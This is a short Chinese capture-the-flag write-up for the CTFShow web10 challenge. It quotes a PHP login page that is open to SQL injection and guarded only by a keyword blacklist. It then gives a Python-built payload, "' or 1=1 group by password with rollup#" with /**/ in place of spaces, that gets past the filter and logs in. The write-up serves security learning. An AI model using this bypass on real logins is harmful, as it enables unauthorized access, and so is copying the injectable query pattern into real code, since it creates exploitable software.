文章

CTFShow_web10

发表于 更新于
作者 Leo 1 分钟阅读

玩玩web

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

<?php
		$flag="";
        function replaceSpecialChar($strParam){
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
             return preg_replace($regex,"",$strParam);
        }
        if (!$con)
        {
            die('Could not connect: ' . mysqli_error());
        }
		if(strlen($username)!=strlen(replaceSpecialChar($username))){
			die("sql inject error");
		}
		if(strlen($password)!=strlen(replaceSpecialChar($password))){
			die("sql inject error");
		}
		$sql="select * from user where username = '$username'";
		$result=mysqli_query($con,$sql);
			if(mysqli_num_rows($result)>0){
					while($row=mysqli_fetch_assoc($result)){
						if($password==$row['password']){
							echo "登陆成功<br>";
							echo $flag;
						}

					 }
			}
    ?>

代码审计

  1. 行内注释

  2. 虚拟表链接 密码为空

1
2
3
4
5
6
7

user_name = """'username=' or 1=1 group by password with rollup#"""
password = """&password="""

parm = user_name + password
new_str = parm.replace(" ", "/**/")
print(new_str)

BurpSuite

alt text

CTF
CTF Web
本文由作者按照 CC BY 4.0 进行授权